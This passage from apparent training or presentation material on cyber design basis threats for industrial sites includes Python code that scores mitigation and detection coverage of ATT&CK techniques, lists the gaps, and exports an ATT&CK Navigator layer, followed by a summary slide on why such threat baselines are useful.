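        "T1195": "Supply Chain Compromise",
    },
    "notes": ["ICS-tailored malware", "destructive capability", "no collusion with insider"],
}

# Constructed site coverage: whether a mitigation and a detection exist per
# technique. These values are assumptions for illustration only.
SITE_COVERAGE = {
    "T1189": {"mitigated": True, "detected": True},
    "T1133": {"mitigated": True, "detected": False},
    "T1078": {"mitigated": False, "detected": True},
    "T1195": {"mitigated": False, "detected": False},
}

NO_COVERAGE = {"mitigated": False, "detected": False}


def score(cov):
    """Assumed scale: 0 = nothing, 1 = mitigation or detection, 2 = both."""
    return int(cov["mitigated"]) + int(cov["detected"])


def dbt_gaps(dbt=CYBER_DBT, coverage=SITE_COVERAGE):
    """DBT techniques with neither mitigation nor detection in place."""
    return sorted(tid for tid in dbt["techniques"] if score(coverage.get(tid, NO_COVERAGE)) == 0)


def navigator_layer(dbt=CYBER_DBT, coverage=SITE_COVERAGE):
    """Build a minimal ATT&CK Navigator layer dict; the layer version is assumed."""
    techniques = []
    for tid, name in dbt["techniques"].items():
        cov = coverage.get(tid, NO_COVERAGE)
        techniques.append({
            "techniqueID": tid,
            "score": score(cov),
            "comment": f"{name}: mitigated={cov['mitigated']}, detected={cov['detected']}",
        })
    return {
        "name": dbt["name"],
        "domain": "enterprise-attack",
        "versions": {"layer": "4.4"},  # assumed; match the Navigator build in use
        "description": "; ".join(dbt["notes"]),
        "techniques": techniques,
        "gradient": {"colors": ["#ff6666", "#ffe766", "#8ec843"], "minValue": 0, "maxValue": 2},
    }


def layer_json(dbt=CYBER_DBT, coverage=SITE_COVERAGE):
    """Serialise the layer for import into Navigator."""
    return json.dumps(navigator_layer(dbt, coverage), indent=2)


if __name__ == "__main__":
    print("gaps:", dbt_gaps())
    print(layer_json())
```

The gap list is the "beyond design" conversation from the next slide in concrete form: a DBT behaviour with score 0 is one the site has decided, implicitly, not to defend against.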
107. SUMMARY: WHY SHOULD YOU USE CYBER DBTS?
• ASSESS EFFECTIVENESS OF DEFENSES
• EVALUATE THREAT DETECTION COVERAGE
• DEVELOP AND TEST IR PLAYBOOKS
• TRAIN PERSONNEL
• IDENTIFY ‘BEYOND DESIGN’ SCENARIOS